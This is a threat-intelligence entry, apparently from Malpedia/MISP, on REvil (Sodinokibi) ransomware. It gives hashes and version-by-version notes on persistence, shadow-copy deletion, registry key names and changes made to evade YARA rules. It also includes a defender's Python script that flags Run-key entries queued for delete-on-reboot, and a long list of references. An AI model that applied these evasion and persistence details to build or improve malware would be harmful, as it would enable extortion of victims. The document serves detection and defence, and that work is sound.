SHA1: b859de5ffcb90e4ca8e304d81a4f81e8785bb299
SHA256: 89d80016ff4c6600e8dd8cfad1fa6912af4d21c5457b4e9866d1796939b48dc4
* Enhances whitelisting validation by adding inspection of GetUserDefaultUILanguage and GetSystemDefaultUILanguage
* Partially implements "lock file" logic by generating a lock filename based on the first four bytes of the Base64-decoded pk key, appending a .lock file extension, and adding the filename to the list of whitelisted files in the REvil configuration (It does not appear that this value is referenced after it is created and stored in memory. There is no evidence that a lock file is dropped to disk.)
* Enhances folder whitelisting logic, which takes special consideration of folders associated with "program files" directories
* Hard-codes whitelisting of all direct content within the Program Files or Program Files x86 directories
* Hard-codes whitelisting of "sql" subfolders within program files
* Encrypts program files sub-folders that do not contain "sql" in the path
* Compares other folders to the list of whitelisted folders specified in the REvil configuration to determine if they are whitelisted
* Encodes stored strings used for URI building within the binary and decodes them in memory right before use
* Introduces a REvil registry root key "sub_key" registry value containing the attacker's public key

REvil 1.03
MD5: 3cae02306a95564b1fff4ea45a7dfc00
SHA1: 0ce2cae5287a64138d273007b34933362901783d
SHA256: 78fa32f179224c46ae81252c841e75ee4e80b57e6b026d0a05bb07d34ec37bbf
* Removes lock file logic that was partially implemented in 1.02
* Leverages WMI to continuously monitor for and kill newly launched processes whose names are listed in the prc configuration key (Previous versions performed this action once.)
* Encodes stored shellcode
* Adds the -path argument:
  * Does not wipe folders (even if wipe == true)
  * Does not set desktop background
  * Does not contact the C2 server (even if net == true)
  * Encrypts files in the specified folder and drops the ransom note
* Changes the REvil registry root key to SOFTWARE\QtProject\OrganizationDefaults
* Changes registry key values from --> to:
  * sub_key --> pvg
  * pk_key --> sxsP
  * sk_key --> BDDC8
  * 0_key --> f7gVD7
  * rnd_ext --> Xu7Nnkd
  * stat --> sMMnxpgk

REvil 1.04
MD5: 6e3efb83299d800edf1624ecbc0665e7
SHA1: 0bd22f204c5373f1a22d9a02c59f69f354a2cc0d
SHA256: 2ca64feaaf5ab6cf96677fbc2bc0e1995b3bc93472d7af884139aa757240e3f6
* Leverages PowerShell and WMI to delete shadow copies if the victim's operating system is newer than Windows XP (For Windows XP or older, it uses the original command that was executed in all previous REvil versions.)
* Removes the folder wipe capability
* Changes the REvil registry root key to SOFTWARE\GitForWindows
* Changes registry key values from --> to:
  * pvg --> QPM
  * sxsP --> cMtS
  * BDDC8 --> WGg7j
  * f7gVD7 --> zbhs8h
  * Xu7Nnkd --> H85TP10
  * sMMnxpgk --> GCZg2PXD

REvil v1.05
MD5: cfefcc2edc5c54c74b76e7d1d29e69b2
SHA1: 7423c57db390def08154b77e2b5e043d92d320c7
SHA256: e430479d1ca03a1bc5414e28f6cdbb301939c4c95547492cdbe27b0a123344ea
* Adds a new 'arn' configuration key containing a boolean true/false value that controls whether or not persistence is implemented.
* Implements persistence via a registry Run key. The value's data is set to the full path and filename of the currently running executable. The executable is never moved into any 'working directory' such as %AppData% or %TEMP% as part of the persistence setup. The registry value name used is the hardcoded value 'lNOWZyAWVv':
  * SOFTWARE\Microsoft\Windows\CurrentVersion\Run\lNOWZyAWVv
* Before exiting, REvil sets up its malicious executable to be deleted upon reboot by calling MoveFileExW with the destination set to NULL and the flags set to 4 (MOVEFILE_DELAY_UNTIL_REBOOT). This breaks persistence, however, as the target executable specified in the Run key will no longer exist once the deletion occurs.
* Changes registry key values from --> to:
  * QPM --> tgE
  * cMtS --> 8K09
  * WGg7j --> xMtNc
  * zbhs8h --> CTgE4a
  * H85TP10 --> oE5bZg0
  * GCZg2PXD --> DC408Qp4

REvil v1.06
MD5: 65ff37973426c09b9ff95f354e62959e
SHA1: b53bc09cfbd292af7b3609734a99d101bd24d77e
SHA256: 0e37d9d0a7441a98119eb1361a0605042c4db0e8369b54ba26e6ba08d9b62f1e
* Updated the string decoding function to break existing YARA rules. Likely the result of the blog posted by us.
* Modified handling of network file encryption. Now explicitly passes every possible "Scope" constant to the WNetOpenEnum function when looking for files to encrypt. It also changed the "Resource Type" from RESOURCETYPE_DISK to RESOURCETYPE_ANY, which will now include things like mapped printers.
* Persistence registry value changed from 'lNOWZyAWVv' to 'sNpEShi30R'
* Changes registry key values from --> to:
  * tgE --> 73g
  * 8K09 --> vTGj
  * xMtNc --> Q7PZe
  * CTgE4a --> BuCrIp
  * oE5bZg0 --> lcZd7OY
  * DC408Qp4 --> sLF86MWC

REvil v1.07
MD5: ea4cae3d6d8150215a4d90593a4c30f2
SHA1: 8dcbcbefaedf5675b170af3fd44db93ad864894e
SHA256: 6a2bd52a5d68a7250d1de481dcce91a32f54824c1c540f0a040d05f757220cd3
TBD
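The v1.05 notes above describe a persistence mechanism that defeats itself: a Run value pointing at the executable, followed by a MoveFileExW call with a NULL destination and MOVEFILE_DELAY_UNTIL_REBOOT, which Windows records in the REG_MULTI_SZ value PendingFileRenameOperations under HKLM\SYSTEM\CurrentControlSet\Control\Session Manager as a (source, empty destination) pair. A Run entry whose target is queued for deletion is a strong triage signal. The following is an added example for defenders, not code from Malpedia or the MISP project: it cross-references constructed Run-key and PendingFileRenameOperations contents offline and also matches the two Run value names the entry lists for v1.05 and v1.06. The sample registry data and the helper names (suspicious_run_entries, pending_deletions, target_of) are assumptions made for this illustration.

```python
"""Cross-check Run-key persistence against reboot-time deletions.

Added example (not part of the Malpedia/MISP entry). REvil v1.05 registers a
Run value pointing at its own executable, then schedules that executable for
deletion with MoveFileExW(..., NULL, MOVEFILE_DELAY_UNTIL_REBOOT). Windows
stores such deferred deletes in PendingFileRenameOperations as
(source, destination) pairs, an empty destination meaning "delete". A Run
entry whose target is queued for deletion is therefore worth flagging.
All registry contents below are constructed sample data, not captured values.
"""
import ntpath
import re

# Run value names listed in the entry for REvil v1.05 and v1.06.
KNOWN_REVIL_RUN_NAMES = {"lNOWZyAWVv", "sNpEShi30R"}

# Constructed HKCU\...\CurrentVersion\Run contents: value name -> command line.
SAMPLE_RUN_VALUES = {
    "OneDrive": r'"C:\Users\alice\AppData\Local\Microsoft\OneDrive\OneDrive.exe" /background',
    "lNOWZyAWVv": r"C:\Users\alice\Downloads\invoice_scan.exe",
    "Updater": r"C:\Program Files\Vendor\updater.exe --quiet",
}

# Constructed PendingFileRenameOperations, flattened REG_MULTI_SZ:
# [source1, destination1, source2, destination2, ...]. The "\??\" prefix is the
# NT object-manager path form that MoveFileExW writes into this value.
SAMPLE_PENDING = [
    "\\??\\C:\\Users\\alice\\Downloads\\invoice_scan.exe", "",
    "\\??\\C:\\Windows\\Temp\\patch.tmp", "\\??\\C:\\Windows\\System32\\patch.dll",
]

NT_PREFIX = "\\??\\"


def _norm(path):
    """Strip the NT prefix and normalise case/separators for comparison."""
    if path.startswith(NT_PREFIX):
        path = path[len(NT_PREFIX):]
    return ntpath.normcase(path)


def pending_deletions(multi_sz):
    """Return the normalised set of paths queued for delete-on-reboot."""
    doomed = set()
    for src, dst in zip(multi_sz[0::2], multi_sz[1::2]):
        if dst == "":  # empty destination == delete, per MoveFileExW semantics
            doomed.add(_norm(src))
    return doomed


def target_of(command):
    """Extract the executable path from a Run-key command line."""
    quoted = re.match(r'\s*"([^"]+)"', command)
    if quoted:
        return quoted.group(1)
    unquoted = re.match(r"\s*(.+?\.exe)", command, re.IGNORECASE)
    return unquoted.group(1) if unquoted else command.strip()


def suspicious_run_entries(run_values, multi_sz):
    """Flag Run values whose target is pending deletion or carries a known REvil name.

    Returns a list of (value_name, target_path, [reasons]).
    """
    doomed = pending_deletions(multi_sz)
    findings = []
    for name, cmd in run_values.items():
        target = target_of(cmd)
        reasons = []
        if _norm(target) in doomed:
            reasons.append("Run target is queued for delete-on-reboot")
        if name in KNOWN_REVIL_RUN_NAMES:
            reasons.append("value name matches REvil v1.05/v1.06 persistence")
        if reasons:
            findings.append((name, target, reasons))
    return findings


if __name__ == "__main__":
    for name, path, why in suspicious_run_entries(SAMPLE_RUN_VALUES, SAMPLE_PENDING):
        print(f"{name}: {path} -> {'; '.join(why)}")
```

On a live host the two inputs would come from winreg (HKCU/HKLM Run keys and the Session Manager value); the matching logic is unchanged. The delete-on-reboot check is the more durable of the two signals, since the value names changed between v1.05 and v1.06 and can change again.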

The tag is: misp-galaxy:malpedia="REvil (Windows)"

REvil (Windows) is also known as:

  • Sodin

  • Sodinokibi

Table 4445. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.revil

https://cisoclub.ru/doc/otchet-kompanii-group-ib-ransomware-uncovered-2020-2021/?bp-attachment=group-ib_ransomware_uncovered_2020-2021.pdf

https://ke-la.com/how-ransomware-gangs-find-new-monetization-schemes-and-evolve-in-marketing/

https://twitter.com/Jacob_Pimental/status/1391055792774729728

https://f.hubspotusercontent10.net/hubfs/5943619/Whitepaper-Downloads/Ransomware_in_ICS_Environments_Whitepaper_10_12_20.pdf

https://www.advanced-intel.com/post/adversarial-perspective-advintel-breach-avoidance-through-monitoring-initial-vulnerabilities

https://home.treasury.gov/news/press-releases/jy0471

https://www.splunk.com/en_us/blog/security/revil-ransomware-threat-research-update-and-detections.html

https://vulnerability.ch/2021/04/ransomware-and-date-leak-site-publication-time-analysis/

https://redcanary.com/blog/uncompromised-kaseya/

https://twitter.com/VK_Intel/status/1374571480370061312?s=20

https://blog.amossys.fr/sodinokibi-malware-analysis.html

https://www.crowdstrike.com/blog/how-falcon-complete-thwarted-a-revil-ransomware-attack/

https://krebsonsecurity.com/2021/11/revil-ransom-arrest-6m-seizure-and-10m-reward/

https://f.hubspotusercontent10.net/hubfs/7095517/FLINT-Kaseya-Another%20Massive%20Heist%20by%20REvil.pdf

https://www.justice.gov/opa/pr/ukrainian-arrested-and-charged-ransomware-attack-kaseya

https://documents.trendmicro.com/assets/rpt/rpt-navigating-new-frontiers-trend-micro-2021-annual-cybersecurity-report.pdf

https://www.flashpoint-intel.com/blog/possible-universal-revil-master-key-posted-to-xss/

https://krebsonsecurity.com/2021/08/ransomware-gangs-and-the-name-game-distraction/

https://public.intel471.com/blog/ransomware-as-a-service-2020-ryuk-maze-revil-egregor-doppelpaymer/

https://teamt5.org/en/posts/introducing-the-most-profitable-ransomware-revil/

https://gist.githubusercontent.com/fwosar/a63e1249bfccb8395b961d3d780c0354/raw/312b2bbc566cbee2dac7b143dc143c1913ddb729/revil.json

https://www.washingtonpost.com/national-security/ransomware-fbi-revil-decryption-key/2021/09/21/4a9417d0-f15f-11eb-a452-4da5fe48582d_story.html

https://therecord.media/us-arrests-and-charges-ukrainian-man-for-kaseya-ransomware-attack/

https://symantec.broadcom.com/hubfs/The_Ransomware_Threat_September_2021.pdf

https://www.huntress.com/blog/security-researchers-hunt-to-discover-origins-of-the-kaseya-vsa-mass-ransomware-incident

https://news.sophos.com/en-us/2021/06/30/mtr-in-real-time-hand-to-hand-combat-with-revil-ransomware-chasing-a-2-5-million-pay-day/

https://www.goggleheadedhacker.com/blog/post/sodinokibi-ransomware-analysis

https://www.darkowl.com/blog-content/page-not-found-revil-darknet-services-offline-after-attack-last-weekend

https://twitter.com/SophosLabs/status/1413616952313004040?s=20

https://therecord.media/revil-ransomware-executes-supply-chain-attack-via-malicious-kaseya-update/

https://twitter.com/SophosLabs/status/1412056467201462276

https://www.bleepingcomputer.com/news/security/sodinokibi-ransomware-hits-new-york-airport-systems/

https://blog.morphisec.com/real-time-prevention-of-the-kaseya-vsa-supply-chain-revil-ransomware-attack

https://i.blackhat.com/eu-20/Wednesday/eu-20-Clarke-Its-Not-FINished-The-Evolving-Maturity-In-Ransomware-Operations.pdf

https://therecord.media/i-scrounged-through-the-trash-heaps-now-im-a-millionaire-an-interview-with-revils-unknown/

https://www.cert.ssi.gouv.fr/uploads/CERTFR-2021-CTI-009.pdf

https://www.bleepingcomputer.com/news/security/revil-ransomware-gang-claims-over-100-million-profit-in-a-year/

https://twitter.com/fwosar/status/1420119812815138824

https://www.trendmicro.com/vinfo/us/security/news/ransomware-spotlight/ransomware-spotlight-revil

https://docs.google.com/spreadsheets/d/1MI8Z2tBhmqQ5X8Wf_ozv3dVjz5sJOs-3

https://blog.intel471.com/2020/03/31/revil-ransomware-as-a-service-an-analysis-of-a-ransomware-affiliate-operation/

https://www.fbi.gov/wanted/cyber/yevgyeniy-igoryevich-polyanin

https://www.bleepingcomputer.com/news/security/sodinokibi-ransomware-threatens-to-publish-data-of-automotive-group/

https://research.checkpoint.com/2020/graphology-of-an-exploit-playbit/

https://twitter.com/SyscallE/status/1411074271875670022

https://cocomelonc.github.io/malware/2023/02/02/malware-analysis-7.html

https://blog.truesec.com/2021/07/04/kaseya-supply-chain-attack-targeting-msps-to-deliver-revil-ransomware/

https://blag.nullteilerfrei.de/2020/02/02/defeating-sodinokibi-revil-string-obfuscation-in-ghidra/

https://cti-league.com/wp-content/uploads/2021/02/CTI-League-Darknet-Report-2021.pdf

https://twitter.com/AdamTheAnalyst/status/1409499591452639242?s=20

https://www.bleepingcomputer.com/news/security/darkside-ransomware-made-90-million-in-just-nine-months/

https://www.bleepingcomputer.com/news/security/kaseyas-universal-revil-decryption-key-leaked-on-a-hacking-forum/

https://twitter.com/fwosar/status/1411281334870368260

https://www.br.de/nachrichten/deutschland-welt/mutmasslicher-ransomware-millionaer-identifiziert,Sn3iHgJ

https://diicot.ro/mass-media/3341-comunicat-de-presa-2-08-11-2021

https://us-cert.cisa.gov/ncas/current-activity/2021/07/04/cisa-fbi-guidance-msps-and-their-customers-affected-kaseya-vsa

https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/diving-deeper-into-the-kaseya-vsa-attack-revil-returns-and-other-hackers-are-riding-their-coattails/

https://www.certego.net/en/news/malware-tales-sodinokibi/

https://asec.ahnlab.com/ko/19860/

https://therecord.media/ransomwhere-project-wants-to-create-a-database-of-past-ransomware-payments/

https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/sodinokibi-ransomware-cobalt-strike-pos

https://www.welivesecurity.com/wp-content/uploads/2020/07/ESET_Threat_Report_Q22020.pdf

https://www.kaseya.com/potential-attack-on-kaseya-vsa/

https://www.digitalshadows.com/blog-and-research/competitions-on-russian-language-cybercriminal-forums-sharing-expertise-or-threat-actor-showboating/

https://www.documentcloud.org/documents/21505031-hgsac-staff-report-americas-data-held-hostage-032422

https://blog.talosintelligence.com/2019/04/sodinokibi-ransomware-exploits-weblogic.html

https://www.bleepingcomputer.com/news/security/sodinokibi-ransomware-publishes-stolen-data-for-the-first-time/

https://news.sophos.com/en-us/2021/06/11/relentless-revil-revealed/

https://doublepulsar.com/kaseya-supply-chain-attack-delivers-mass-ransomware-event-to-us-companies-76e4ec6ec64b

http://www.fsb.ru/fsb/press/message/single.htm%21id%3D10439388%40fsbMessage.html

https://cybersecurity.att.com/blogs/labs-research/revils-new-linux-version

https://unit42.paloaltonetworks.com/revil-threat-actors/

https://www.trendmicro.com/vinfo/us/security/news/cybercrime-and-digital-threats/ransomware-as-a-service-enabler-of-widespread-attacks

https://www.bleepingcomputer.com/news/security/revil-ransomware-shuts-down-again-after-tor-sites-were-hijacked/

https://unit42.paloaltonetworks.com/prometheus-ransomware/

https://www.flashpoint-intel.com/blog/revils-cryptobackdoor-con-ransomware-groups-tactics-roil-affiliates-sparking-a-fallout/

https://www.bleepingcomputer.com/news/security/blackmatter-ransomware-gang-rises-from-the-ashes-of-darkside-revil/

https://storage.courtlistener.com/recap/gov.uscourts.txnd.351760/gov.uscourts.txnd.351760.1.0_3.pdf

https://www.pwc.co.uk/cyber-security/assets/cyber-threats-2019-retrospect.pdf

https://www.splunk.com/en_us/blog/security/kaseya-sera-what-revil-shall-encrypt-shall-encrypt.html

https://query.prod.cms.rt.microsoft.com/cms/api/am/binary/RE54L7v

https://hatching.io/blog/ransomware-part2

https://public.intel471.com/blog/revil-ransomware-interview-russian-osint-100-million/

https://www.bleepingcomputer.com/news/security/sodinokibi-ransomware-to-stop-taking-bitcoin-to-hide-money-trail/

https://www.pandasecurity.com/emailhtml/2007-CAM-RANSOMWARE-AD360-WG/2006-Report-Sodinokibi-EN.pdf

https://kaseya.app.box.com/s/0ysvgss7w48nxh8k1xt7fqhbcjxhas40

https://teamt5.org/tw/posts/revil-dll-sideloading-technique-used-by-other-hackers/

https://www.connectwise.com/resources/revil-profile

https://www.crowdstrike.com/blog/double-trouble-ransomware-data-leak-extortion-part-2/

https://www.youtube.com/watch?v=tZVFMVm5GAk

https://www.nytimes.com/2019/08/22/us/ransomware-attacks-hacking.html

https://www.kpn.com/security-blogs/Tracking-REvil.htm

https://www.flashpoint-intel.com/blog/darkside-ransomware-links-to-revil-difficult-to-dismiss/

https://twitter.com/LloydLabs/status/1411098844209819648

https://analyst1.com/file-assets/History-of-REvil.pdf

https://blog.sensecy.com/2020/08/20/global-ransomware-attacks-in-2020-the-top-4-vulnerabilities/

https://www.elliptic.co/blog/revil-revealed-tracking-ransomware-negotiation-and-payment

https://www.youtube.com/watch?v=LUxOcpIRxmg

https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2021GTR.pdf

https://twitter.com/Jacob_Pimental/status/1398356030489251842?s=20

https://threatpost.com/ransomware-revil-sites-disappears/167745/

https://www.cybereason.com/blog/cybereason-vs-revil-ransomware-the-kaseya-chronicles

https://asec.ahnlab.com/ko/19640/

https://therecord.media/an-interview-with-blackmatter-a-new-ransomware-group-thats-learning-from-the-mistakes-of-darkside-and-revil/

https://www.domaintools.com/resources/blog/revealing-revil-ransomware-with-domaintools-and-maltego

https://www.trendmicro.com/en_in/research/21/k/global-operations-lead-to-arrests-of-alleged-members-of-gandcrab.html

https://www.trendmicro.com/en_us/research/21/h/supply-chain-attacks-from-a-managed-detection-and-response-persp.html

https://www.bbc.com/news/technology-59297187

https://blogs.blackberry.com/en/2021/11/revil-under-the-microscope

https://thedfirreport.com/2021/03/29/sodinokibi-aka-revil-ransomware/

https://www.crowdstrike.com/blog/double-trouble-ransomware-data-leak-extortion-part-1/

https://www.ironnet.com/blog/ransomware-graphic-blog

https://www.trendmicro.com/vinfo/us/security/news/cybercrime-and-digital-threats/ransomware-double-extortion-and-beyond-revil-clop-and-conti

https://www.trendmicro.com/en_us/research/22/g/gootkit-loaders-updated-tactics-and-fileless-delivery-of-cobalt-strike.html

https://www.acronis.com/en-sg/articles/sodinokibi-ransomware/

https://www.bleepingcomputer.com/news/security/kaseya-obtains-universal-decryptor-for-revil-ransomware-victims/

https://www.zscaler.com/blogs/security-research/kaseya-supply-chain-ransomware-attack-technical-analysis-revil-payload

https://www.elastic.co/blog/elastic-security-prevents-100-percent-of-revil-ransomware-samples?utm_content=&utm_medium=social&utm_source=twitter

https://www.pwc.co.uk/issues/cyber-security-services/insights/what-is-behind-ransomware-attacks-increase.html

https://raw.githubusercontent.com/k-vitali/Malware-Misc-RE/master/2022-05-01-revil-reborn-ransom.vk.cfg.txt

https://www.bleepingcomputer.com/news/security/revil-ransomwares-servers-mysteriously-come-back-online/

https://www.cyjax.com/2021/07/09/revilevolution/

https://www.bleepingcomputer.com/news/security/another-ransomware-will-now-publish-victims-data-if-not-paid/

https://www.crowdstrike.com/blog/the-evolution-of-revil-ransomware-and-pinchy-spider/

https://www.europol.europa.eu/newsroom/news/five-affiliates-to-sodinokibi/revil-unplugged

https://ics-cert.kaspersky.com/media/KASPERSKY_H1_2020_ICS_REPORT_EN.pdf

https://threatintel.blog/OPBlueRaven-Part1/

https://www.bleepingcomputer.com/news/security/revil-ransomware-devs-added-a-backdoor-to-cheat-affiliates/

https://www.goggleheadedhacker.com/blog/post/reversing-crypto-functions

https://ke-la.com/to-attack-or-not-to-attack-targeting-the-healthcare-sector-in-the-underground-ecosystem/

https://www.bleepingcomputer.com/news/security/revil-ransomware-returns-new-malware-sample-confirms-gang-is-back/

https://web.archive.org/web/20210305181115/https://cisoclub.ru/doc/otchet-kompanii-group-ib-ransomware-uncovered-2020-2021/?bp-attachment=group-ib_ransomware_uncovered_2020-2021.pdf

https://ke-la.com/zooming-into-darknet-threats-targeting-jp-orgs-kela/

https://securityscorecard.com/research/a-detailed-analysis-of-the-last-version-of-revil-ransomware

https://www.netskope.com/blog/netskope-threat-coverage-revil

https://download.microsoft.com/download/f/8/1/f816b8b6-bee3-41e5-b6cc-e925a5688f61/Microsoft_Digital_Defense_Report_2020_September.pdf

https://therecord.media/darkside-gang-estimated-to-have-made-over-90-million-from-ransomware-attacks/

https://securelist.com/sodin-ransomware/91473/

https://www.cnbc.com/2021/04/23/axis-of-revil-inside-the-hacker-collective-taunting-apple.html

https://www.splunk.com/en_us/blog/security/gone-in-52-seconds-and-42-minutes-a-comparative-analysis-of-ransomware-encryption-speed.html

https://twitter.com/alex_il/status/1412403420217159694

https://www.secureworks.com/blog/revil-development-adds-confidence-about-gold-southfield-reemergence?linkId=164334801

https://www.bleepingcomputer.com/news/security/ransomware-threatens-to-reveal-companys-dirty-secrets/

https://www.digitalshadows.com/blog-and-research/revil-analysis-of-competing-hypotheses/

https://www.recordedfuture.com/blackmatter-ransomware-successor-darkside-revil/

https://www.darktrace.com/en/blog/staying-ahead-of-r-evils-ransomware-as-a-service-business-model/

https://krebsonsecurity.com/2019/07/is-revil-the-new-gandcrab-ransomware/

https://storage.courtlistener.com/recap/gov.uscourts.txnd.352371/gov.uscourts.txnd.352371.1.0_1.pdf

https://www.crowdstrike.com/blog/how-big-game-hunting-ttps-shifted-after-darkside-pipeline-attack/

https://www.huntandhackett.com/blog/revil-the-usage-of-legitimate-remote-admin-tooling

https://medium.com/s2wlab/deep-analysis-of-revil-ransomware-written-in-korean-d1899c0e9317

https://www.cyborgsecurity.com/cyborg_labs/hunting-ransomware-inhibiting-system-backup-or-recovery/

https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/kaseya-ransomware-supply-chain

https://awakesecurity.com/blog/threat-hunting-for-revil-ransomware/

https://blog.group-ib.com/REvil_RaaS

https://www.advanced-intel.com/post/inside-revil-extortionist-machine-predictive-insights

https://www.appgate.com/blog/electric-company-ransomware-attack-calls-for-14-million-in-ransom

https://www.blackberry.com/content/dam/blackberry-com/asset/enterprise/pdf/wp-spark-state-of-ransomware.pdf

https://mandiant.widen.net/s/pkffwrbjlz/m-trends-2023

https://news.sophos.com/en-us/2021/07/04/independence-day-revil-uses-supply-chain-exploit-to-attack-hundreds-of-businesses

https://ke-la.com/ransomware-gangs-are-starting-to-look-like-oceans-11/

https://blog.truesec.com/2021/07/06/kaseya-vsa-zero-day-exploit

https://blog.talosintelligence.com/2021/03/ctir-trends-winter-2020-21.html

https://searchsecurity.techtarget.com/feature/Ransomware-negotiations-An-inside-look-at-the-process

https://i.blackhat.com/eu-20/Wednesday/eu-20-Clarke-Its-Not-FINished-The-Evolving-Maturity-In-Ransomware-Operations-wp.pdf

https://us-cert.cisa.gov/ncas/alerts/aa20-345a

https://twitter.com/VK_Intel/status/1411066870350942213

https://www.bankinfosecurity.com/interviews/ransomware-files-episode-6-kaseya-revil-i-5045

https://ibm.ent.box.com/s/hs5pcayhbbhjvj8di5sqdpbbd88tsh89

https://www.advanced-intel.com/post/from-qbot-with-revil-ransomware-initial-attack-exposure-of-jbs

https://medium.com/s2wlab/w4-may-en-story-of-the-week-ransomware-on-the-darkweb-5f5b8d4c3b6f

https://www.bleepingcomputer.com/news/security/sodinokibi-ransomware-may-tip-nasdaq-on-attacks-to-hurt-stock-prices/

https://www.flashpoint-intel.com/blog/cl0p-and-revil-escalate-their-ransomware-tactics/

https://www.advintel.io/post/storm-in-safe-haven-takeaways-from-russian-authorities-takedown-of-revil

https://www.secureworks.com/blog/revil-the-gandcrab-connection

https://isc.sans.edu/diary/27012

https://securityaffairs.co/wordpress/98694/malware/sodinokibi-kenneth-cole-data-breach.html

https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2020CrowdStrikeGlobalThreatReport.pdf

https://www.crowdstrike.com/blog/how-to-defend-against-conti-darkside-revil-and-other-ransomware/

https://www.domaintools.com/resources/blog/the-most-prolific-ransomware-families-a-defenders-guide

https://www.pwc.co.uk/cyber-security/pdf/pwc-cyber-threats-2020-a-year-in-retrospect.pdf

https://www.zdnet.com/article/revil-ransomware-gang-launches-auction-site-to-sell-stolen-data/

https://blog.gigamon.com/2021/07/08/observations-and-recommendations-from-the-ongoing-revil-kaseya-incident/

https://blog.malwarebytes.com/threat-analysis/2020/11/german-users-targeted-with-gootkit-banker-or-revil-ransomware/

https://www.youtube.com/watch?v=l2P5CMH9TE0

https://tehtris.com/fr/peut-on-neutraliser-un-ransomware-lance-en-tant-que-system-sur-des-milliers-de-machines-en-meme-temps/

https://blag.nullteilerfrei.de/2019/11/09/api-hashing-why-and-how/

https://securelist.com/revil-ransomware-attack-on-msp-companies/103075/

https://twitter.com/svch0st/status/1411537562380816384

https://www.cert.ssi.gouv.fr/cti/CERTFR-2021-CTI-009/

https://www.trendmicro.com/en_us/research/21/a/sodinokibi-ransomware.html

https://blogs.blackberry.com/en/2021/05/threat-thursday-dr-revil-ransomware-strikes-again-employs-double-extortion-tactics

https://intel471.com/blog/changes-in-revil-ransomware-version-2-2

https://www.bleepingcomputer.com/news/security/a-look-inside-the-highly-profitable-sodinokibi-ransomware-business/

https://securingtomorrow.mcafee.com/other-blogs/mcafee-labs/mcafee-atr-analyzes-sodinokibi-aka-revil-ransomware-as-a-service-crescendo/

https://ke-la.com/darknet-threat-actors-are-not-playing-games-with-the-gaming-industry/

https://www.youtube.com/watch?v=P8o6GItci5w

https://www.bleepingcomputer.com/news/security/popular-russian-hacking-forum-xss-bans-all-ransomware-topics/

https://twitter.com/R3MRUM/status/1412064882623713283

https://dissectingmalwa.re/germanwipers-big-brother-gandgrabs-kid-sodinokibi.html

https://medium.com/@underthebreach/tracking-down-revils-lalartu-by-utilizing-multiple-osint-methods-2bf3a6c65a80

https://drive.google.com/file/d/1ph1E0onZ7TiNyG87k4WjofCKNuCafMLk/view

https://securelist.com/ransomware-world-in-2021/102169/

https://www.accenture.com/us-en/blogs/cyber-defense/moving-left-ransomware-boom

https://research.checkpoint.com/2023/following-the-scent-of-trickgate-6-year-old-packer-used-to-deploy-the-most-wanted-malware/

https://therecord.media/darkside-ransomware-gang-says-it-lost-control-of-its-servers-money-a-day-after-biden-threat/

https://www.coveware.com/blog/ransomware-attack-vectors-shift-as-new-software-vulnerability-exploits-abound

https://www.crowdstrike.com/blog/carbon-spider-sprite-spider-target-esxi-servers-with-ransomware/?utm_campaign=blog&utm_medium=soc&utm_source=twtr&utm_content=sprout

https://www.flashpoint-intel.com/blog/chatter-indicates-blackmatter-as-revil-successor/

https://vimeo.com/449849549

https://www.digitalshadows.com/blog-and-research/ransomware-as-a-service-rogue-affiliates-and-whats-next/

https://ke-la.com/easy-way-in-5-ransomware-victims-had-their-pulse-secure-vpn-credentials-leaked/

https://www.accenture.com/us-en/blogs/cyber-defense/evolving-danger-ransomware-extortion

https://www.crowdstrike.com/blog/how-crowdstrike-stops-revil-ransomware-from-kaseya-attack/

https://www.secureworks.com/research/lv-ransomware

https://www.reuters.com/technology/exclusive-governments-turn-tables-ransomware-gang-revil-by-pushing-it-offline-2021-10-21/

https://www.advanced-intel.com/post/the-dark-web-of-intrigue-how-revil-used-the-underground-ecosystem-to-form-an-extortion-cartel

https://www.bleepingcomputer.com/news/security/revil-gang-tries-to-extort-apple-threatens-to-sell-stolen-blueprints/

https://securityintelligence.com/posts/sodinokibi-revil-ransomware-disrupt-trade-secrets/

https://www.hsgac.senate.gov/media/minority-media/new-portman-report-demonstrates-threat-ransomware-presents-to-the-united-states

https://www.cert.ssi.gouv.fr/uploads/CERTFR-2020-CTI-001.pdf

https://www.bleepingcomputer.com/news/security/revil-ransomware-hits-managedcom-hosting-provider-500k-ransom/

https://www.secureworks.com/blog/revil-ransomware-reemerges-after-shutdown-universal-decryptor-released

https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/undressing-the-revil/

https://www.boll.ch/datasheets/WG_Threat_Report_EN.pdf

https://www.bleepingcomputer.com/news/security/sodinokibi-ransomware-says-travelex-will-pay-one-way-or-another/

https://www.zdnet.com/article/revil-ransomware-gang-acquires-kpot-malware/

https://blog.redteam.pl/2020/05/sodinokibi-revil-ransomware.html

https://areteir.com/wp-content/uploads/2020/07/Arete_Insight_Sodino-Ransomware_June-2020.pdf

https://www.bleepingcomputer.com/news/security/sodinokibi-ransomware-hits-travelex-demands-3-million/

https://www.bleepingcomputer.com/news/security/revil-ransomware-has-a-new-windows-safe-mode-encryption-mode/

https://blogs.blackberry.com/en/2022/01/kraken-the-code-on-prometheus

https://www.bleepingcomputer.com/news/security/revils-tor-sites-come-alive-to-redirect-to-new-ransomware-operation/

https://www.reddit.com/r/msp/comments/ocggbv/crticial_ransomware_incident_in_progress/

https://cybleinc.com/2021/07/03/uncensored-interview-with-revil-sodinokibi-ransomware-operators/

https://securityintelligence.com/posts/sodinokibi-ransomware-incident-response-intelligence-together/

https://www.crowdstrike.com/blog/big-game-hunting-on-the-rise-again-according-to-ecrime-index/

https://www.fincen.gov/sites/default/files/advisory/2021-11-08/FinCEN%20Ransomware%20Advisory_FINAL_508_.pdf

https://www.hornetsecurity.com/en/security-informationen-en/leakware-ransomware-hybrid-attacks/

https://news.sophos.com/en-us/2021/06/30/what-to-expect-when-youve-been-hit-with-revil-ransomware/

https://www.grahamcluley.com/travelex-paid-ransom/

https://www.secureworks.com/research/revil-sodinokibi-ransomware

https://unit42.paloaltonetworks.com/threat-brief-kaseya-vsa-ransomware-attacks/

https://www.justice.gov/opa/pr/sodinokibirevil-ransomware-defendant-extradited-united-states-and-arraigned-texas

https://jsac.jpcert.or.jp/archive/2020/pdf/JSAC2020_1_tamada-yamazaki-nakatsuru_en.pdf

https://russian.rt.com/russia/article/926347-barnaulec-rozysk-fbr-kibermoshennichestvo

https://velzart.nl/blog/ransomeware/

